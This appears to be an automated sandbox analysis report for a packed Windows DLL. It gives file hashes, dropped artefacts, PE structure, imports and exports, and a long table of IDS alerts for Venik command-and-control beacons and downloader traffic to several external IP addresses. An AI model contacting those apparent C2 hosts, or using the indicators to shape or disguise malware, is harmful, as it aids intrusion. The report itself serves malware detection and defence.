                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):8272
                                                                                                                                          Entropy (8bit):3.6921630436836645
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:R6l7wVeJxh6Zr6Y5E6mgmfTZxprt89bzisfvRm:R6lXJH6V6Ya6mgmfTZWzhfU
                                                                                                                                          MD5:8916BBE684FB65E6A7897EF2C20F45E5
                                                                                                                                          SHA1:3032964921D169708098F0966414928E7DCB3E78
                                                                                                                                          SHA-256:49562928E2EB69FF14969E575064914EF5F066AA7CD5F0F0252DA268156B31DD
                                                                                                                                          SHA-512:91FB8E4512C0584ED91F1E96AC811EB0B48B67C3912C3B6C4455F72F81638A024DC3184DFF88C2FC9E1D9C2262FC65A8A5756B3A9C2D1869FEB46BEDE8E12370
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4654
                                                                                                                                          Entropy (8bit):4.459364086734924
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:cvIwWl8zsMtJg77aI9bIWpW8VYbYm8M4JCdPSF8q+q8/ApGScS5d:uIjfyI7Bh7V/JUqRJ35d
                                                                                                                                          MD5:28BA515A9856E3F98D7128B14E152AF4
                                                                                                                                          SHA1:B65592BBC1643BF834C18F0784364BB646E44AE3
                                                                                                                                          SHA-256:0770CA199BC129CEBB1C3C5E6533F65B27AF5F81D5A8AC6C70E88734C8A1463F
                                                                                                                                          SHA-512:DF7D51ABF119AF4963F0818FA863530F538C5D4328AC5C8F6A00909C9BBB9E85E6940C8A75A5BB7AB2C95B8CABA518D6B08BF6F6B857794BDF0BD95519F0E532
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638256" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:33:23 2024, 0x1205a4 type
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):42710
                                                                                                                                          Entropy (8bit):2.100327838530544
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:ycrPIZINXJX8O5H4cmrkQI+jX7DoCuqSRI:lrwZIP5HZmrkts7DPv
                                                                                                                                          MD5:6573D113291F01BB9704A60A9BE33D78
                                                                                                                                          SHA1:0ED95C2DAF165B7F071ADFAF7428BF9244B639E3
                                                                                                                                          SHA-256:28A1EE93DF7272DF398B5E1DC9A700CD33286E79AE87022AB153B6B743B52C19
                                                                                                                                          SHA-512:6616ACB9C4DC9AD56067EA3B8918F61FCC86A7AC0B8175D11F7F714982E478ADEEE7C2E6BBC541C0D7F2A2354AE81BAA4A8B4BC53A88A1ECF4DC86191E77A4F6
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):8264
                                                                                                                                          Entropy (8bit):3.6958878004552824
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:R6l7wVeJZr6m6YR/6IgmfTxxprt89bBbsfgrm:R6lXJV6m6YJ6IgmfTxWBgfh
                                                                                                                                          MD5:E7880C0EA4F9F9F7F5DC94C7CEAECFA3
                                                                                                                                          SHA1:5401AD7EFF43E3D8D17BDA346AFE505B628D2CB0
                                                                                                                                          SHA-256:0606E07946A8F518B03E01DA84FD957F2F9752149FD6D8A89EEE5E053B3AA66C
                                                                                                                                          SHA-512:457E65F607EB01D5603100D53BB8CEF2501803D2FCC4A11D6A1B884033E68B074C0AE7322DDCDD46DDD2F1DCB5422B55FC43578B66B1C7A8DD412B62BB4CADA5
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4654
                                                                                                                                          Entropy (8bit):4.460469187588189
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:cvIwWl8zsMtJg77aI9bIWpW8VY0Ym8M4JCdPOFIA+q8/AoT4GScSEd:uIjfyI7Bh7V4JkAAcJ3Ed
                                                                                                                                          MD5:587D70F6CBC75AA7D4770610CF9C25D8
                                                                                                                                          SHA1:6060E86CE29B69B246B9104F89BB5ECF1792DD3C
                                                                                                                                          SHA-256:2E0477343406CDC566A635518C6EB555371A872BA707B9CCA20EF29DE66FF564
                                                                                                                                          SHA-512:711EF54659BF97144684A493080C1A42A34964CD57D81ED5C7E39087304E7F3CB1B6CACD7E48C6FAC402EE4981F5908879E532AE7650C8BFD734318F67BD2387
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638256" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):328
                                                                                                                                          Entropy (8bit):3.548225307988918
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:kKaB3hK8ZsTwD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:accImsLNkPlE99SNxAhUe/3
                                                                                                                                          MD5:DAD428D83DA7E628B70EF65FE757B78C
                                                                                                                                          SHA1:B99C78E7AB2073CD7F05DAAC0CF550F76459B5E0
                                                                                                                                          SHA-256:78F485513A1D3EE82C40C17062D60B9C6C02F5A3602B27D2EEAC726C2897186C
                                                                                                                                          SHA-512:4E2F495BE7BE5083E82BC114F239925A3298D46B08D7C15B77DC64DF553A7AB1BCA11BE7BFD1D2AE1CFBA9F4631B0B892BDCA601BF9D507455CA9EC51C35DC94
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:p...... ......../I.$....(...............................................Z g..W.. ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1835008
                                                                                                                                          Entropy (8bit):4.422271246554642
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:9Svfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNP0uhiTw:kvloTyW+EZMM6DFyl03w
                                                                                                                                          MD5:ECECCBF1A19603FFD20D993D0CC20CD1
                                                                                                                                          SHA1:86B9F67643EF5021125424122AA9219277E7E730
                                                                                                                                          SHA-256:4CAB442ABDF36B5D4432DD50A911052A00CA1D6FFAC016A60F10A3C936185227
                                                                                                                                          SHA-512:5596E3EAE13F17B6C839A29F5B82538081F336ED88525C16BD91E3ED0E97BB5AC9B40165AAEFB34319CBFA3B69E623EE1407CC0D329487C1B0B42F2D3055F539
                                                                                                                                          Malicious:false
Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.B.."R....
                                                                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows, PECompact2 compressed
                                                                                                                                          Entropy (8bit):6.394027469387996
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:QCTYoyX422.dll
                                                                                                                                          File size:322'775 bytes
                                                                                                                                          MD5:d32fca080e7b321914810ff69eafd1a4
                                                                                                                                          SHA1:78131997ac3542a3ce1c2ae4afac1474ba0a19cb
                                                                                                                                          SHA256:2281a8837520789fed9c41a66d241a8cf85b83085da2b0fe0f8408e49bde8cef
                                                                                                                                          SHA512:aa768dae6eb1191f7bb420a2041c70edae6ef679f11f91924fa5b5f96cf945b823f20744db5cc1be9ca951c0a8059a6b5aeba067bc995bfe67cf13a5db93ab53
                                                                                                                                          SSDEEP:6144:YutK09bpsWYrPnP3UKLSr1TS8BbdrFucR+z+qagIK+bcgaI0M:BK0YWYrPP35LSrBS8LQ4+z+qagQYVIZ
                                                                                                                                          TLSH:3964AE0237B552F5D4F70A3A9F35E72DE33438109CA8DD159B8A08C91CE3949AED578B
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... B..N...N...N...B...N.F.....N.......N.......N.......N...@...N.m.D...N...O.^.N.m.E...N.=.H...N.m.J...N.Rich..N................
                                                                                                                                          Icon Hash:7ae282899bbab082
                                                                                                                                          Entrypoint:0x10042ae6
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x10000000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
                                                                                                                                          DLL Characteristics:
                                                                                                                                          Time Stamp:0x565C7C9C [Mon Nov 30 16:43:08 2015 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:4
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:4
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:4
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:1e14d607956b4cc2b9b7835c72bf0b77
                                                                                                                                          Instruction
                                                                                                                                          jmp 00007FCB388165EEh
                                                                                                                                          adc byte ptr [ebp+6E3FA254h], al
                                                                                                                                          or eax, dword ptr [esi]
                                                                                                                                          mov cl, 92h
                                                                                                                                          Programming Language:
                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                          • [ C ] VS98 (6.0) build 8168
                                                                                                                                          • [C++] VS98 (6.0) build 8168
                                                                                                                                          • [RES] VS98 (6.0) cvtres build 1720
                                                                                                                                          • [LNK] VS98 (6.0) imp/exp build 8168
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x4fb24 | 0x68 | .rsrc
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d6cc | 0x118 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4f000 | 0xb10 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x49000 | 0x1628 | .text
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4e000 | 0x4ca00 | b29859f73b90e7f64037da48fbee12a8 | False | 0.5888783391109299 | data | 6.394873960706557 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4f000 | 0x2000 | 0x1e00 | a03763a40a39da37762a5efcd57a5136 | False | 0.6859375 | data | 6.354524003809639 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x51000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_STRING | 0x4b000 | 0x16c | data | English | United States | 0.5521978021978022
RT_STRING | 0x4b170 | 0x86 | data | English | United States | 0.6417910447761194
RT_STRING | 0x4b1f8 | 0x56 | data | English | United States | 0.6744186046511628
RT_STRING | 0x4b250 | 0x16e | data | English | United States | 0.505464480874317
RT_STRING | 0x4b3c0 | 0x128 | data | English | United States | 0.581081081081081
RT_STRING | 0x4b4e8 | 0xd2 | data | English | United States | 0.5761904761904761
RT_STRING | 0x4b5c0 | 0x6a | data | English | United States | 0.660377358490566
RT_STRING | 0x4b630 | 0xc8 | Matlab v4 mat-file (little endian) b, numeric, rows 0, columns 0 | English | United States | 0.555
RT_STRING | 0x4b6f8 | 0x200 | data | English | United States | 0.375
RT_STRING | 0x4b8f8 | 0x23e | data | English | United States | 0.44773519163763065
RT_STRING | 0x4bb38 | 0x12e | data | English | United States | 0.4503311258278146
RT_STRING | 0x4bc68 | 0xca | Matlab v4 mat-file (little endian) O, numeric, rows 0, columns 0 | English | United States | 0.42574257425742573
RT_STRING | 0x4bd38 | 0x252 | data | English | United States | 0.39225589225589225
RT_STRING | 0x4bf90 | 0x28e | data | English | United States | 0.43730886850152906
RT_STRING | 0x4c220 | 0xce | data | English | United States | 0.4563106796116505
RT_STRING | 0x4c2f0 | 0x15c | Matlab v4 mat-file (little endian) a, numeric, rows 0, columns 0 | English | United States | 0.4166666666666667
RT_STRING | 0x4c450 | 0x398 | data | English | United States | 0.375
RT_STRING | 0x4c7e8 | 0x2ae | data | English | United States | 0.3688046647230321
RT_STRING | 0x4ca98 | 0x42 | data | English | United States | 0.4696969696969697
RT_STRING | 0x4cae0 | 0x20 | data | English | United States | 0.34375
RT_STRING | 0x4cb00 | 0x20 | data | English | United States | 0.34375
RT_STRING | 0x4cb20 | 0x20 | data | English | United States | 0.34375
RT_STRING | 0x4cb40 | 0x20 | data | English | United States | 0.34375
RT_STRING | 0x4cb60 | 0x20 | data | English | United States | 0.34375
RT_STRING | 0x4cb80 | 0x20 | data | English | United States | 0.34375
RT_STRING | 0x4cba0 | 0x20 | data | English | United States | 0.34375
RT_STRING | 0x4cbc0 | 0x20 | data | English | United States | 0.34375
RT_STRING | 0x4cbe0 | 0x7a | data | English | United States | 0.6475409836065574
RT_STRING | 0x4cc60 | 0x20 | data | English | United States | 0.34375
RT_STRING | 0x4cc80 | 0x20 | data | English | United States | 0.34375
RT_STRING | 0x4cca0 | 0x13a | Matlab v4 mat-file (little endian) ', numeric, rows 0, columns 0 | English | United States | 0.3821656050955414
RT_STRING | 0x4cde0 | 0x19a | data | English | United States | 0.4195121951219512
RT_STRING | 0x4cf80 | 0x9a | data | English | United States | 0.512987012987013
RT_STRING | 0x4d020 | 0xa8 | data | English | United States | 0.5833333333333334
RT_STRING | 0x4d0c8 | 0x20 | data | English | United States | 0.34375
RT_VERSION | 0x4f7f0 | 0x31c | data | English | United States | 0.4296482412060301
RT_HTML | 0x4d0e8 | 0x49 | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.8493150684931506
RT_HTML | 0x4d138 | 0xd | HTML document, ASCII text, with no line terminators | English | United States | 1.3076923076923077
RT_HTML | 0x4d148 | 0x6be | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.5179606025492468
DLL | Import
MFC42.DLL |
MSVCRT.dll | _strcmpi
KERNEL32.dll | CreateDirectoryA
USER32.dll | GetDesktopWindow
ADVAPI32.dll | RegDeleteValueA
WS2_32.dll | htons
SHLWAPI.dll | PathIsDirectoryA
ole32.dll | CoUninitialize
OLEAUT32.dll | SafeArrayGetVartype
MSVCP60.dll | ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z
NETAPI32.dll | Netbios
KERNEL32.dll | GetModuleFileNameW
KERNEL32.dll | GetModuleHandleA, LoadLibraryA, LocalAlloc, LocalFree, GetModuleFileNameA, ExitProcess
Name | Ordinal | Address
DoAddToFavDlg | 1 | 0x10008645
InputFile | 2 | 0x1000678b
PrintFile | 3 | 0x1000443d
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-19T15:33:39.327074+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49718 | 107.160.131.253 | 18659 | TCP
2024-12-19T15:33:39.327074+0100 | 2812407 | ETPRO MALWARE Win32/Venik HTTP CnC Beacon | 1 | 192.168.2.5 | 49718 | 107.160.131.253 | 18659 | TCP
2024-12-19T15:33:45.397452+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49719 | 107.163.56.110 | 18530 | TCP
2024-12-19T15:33:45.397574+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49792 | 107.160.131.254 | 23588 | TCP
2024-12-19T15:33:45.397604+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49794 | 107.160.131.254 | 23588 | TCP
2024-12-19T15:33:49.117775+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49832 | 116.133.8.92 | 80 | TCP
2024-12-19T15:33:49.522293+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49814 | 107.160.131.254 | 23588 | TCP
2024-12-19T15:33:49.522365+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49815 | 107.160.131.254 | 23588 | TCP
2024-12-19T15:33:53.576110+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49859 | 107.160.131.254 | 23588 | TCP
2024-12-19T15:33:53.576147+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49860 | 116.133.8.92 | 80 | TCP
2024-12-19T15:33:53.576176+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49857 | 107.160.131.254 | 23588 | TCP
2024-12-19T15:33:56.329824+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49899 | 116.133.8.92 | 80 | TCP
2024-12-19T15:33:57.708282+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49900 | 107.160.131.254 | 23588 | TCP
2024-12-19T15:33:57.708363+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49897 | 107.160.131.254 | 23588 | TCP
2024-12-19T15:34:01.922280+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49943 | 107.160.131.254 | 23588 | TCP
2024-12-19T15:34:01.922308+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49944 | 116.133.8.92 | 80 | TCP
2024-12-19T15:34:01.922315+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49938 | 107.160.131.254 | 23588 | TCP
2024-12-19T15:34:03.882293+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49983 | 116.133.8.92 | 80 | TCP
2024-12-19T15:34:05.938341+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49982 | 107.160.131.254 | 23588 | TCP
2024-12-19T15:34:05.938912+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49980 | 107.160.131.254 | 23588 | TCP
                                                                                                                                          2024-12-19T15:34:07.901128+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550029116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:09.938157+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550028107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:09.938193+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550026107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:11.998149+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550073116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:14.078380+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550072107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:14.078461+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550074107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:16.124537+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550124116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:18.094296+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550123107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:18.094296+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550121107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:20.060517+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550169116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:22.219354+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550166107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:22.219408+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550168107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:26.235546+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550211116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:26.235588+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550210107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:26.235589+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550208107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:28.300492+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550261116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:30.260068+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550256107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:30.260102+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550260107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:32.273166+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550312116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:34.390927+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550311107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:34.391007+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550308107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:37.014304+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550373116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:38.517665+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550374107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:38.518078+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550371107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:40.492801+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550442116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:42.517559+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550443107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:42.517591+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550436107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:44.460965+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550514116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:46.532733+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550515107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:46.532789+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550510107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:50.548185+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550597107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:50.548218+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550599116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:50.548231+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550600107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:54.563154+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550694116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:34:54.563201+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550690107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:54.563221+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550692107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:58.581718+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550815107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:58.581765+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550820107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:34:58.581797+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550821116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:00.531712+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550968116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:02.594584+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550967107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:02.594994+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.550962107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:04.602169+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.551159116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:06.840239+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551158107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:06.840273+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551148107.160.131.25423588TCP
                                                                                                                                          2024-12-19T15:35:08.945512+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.551338116.133.8.9280TCP
                                                                                                                                          2024-12-19T15:35:10.989053+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.551331107.160.131.25423588TCP
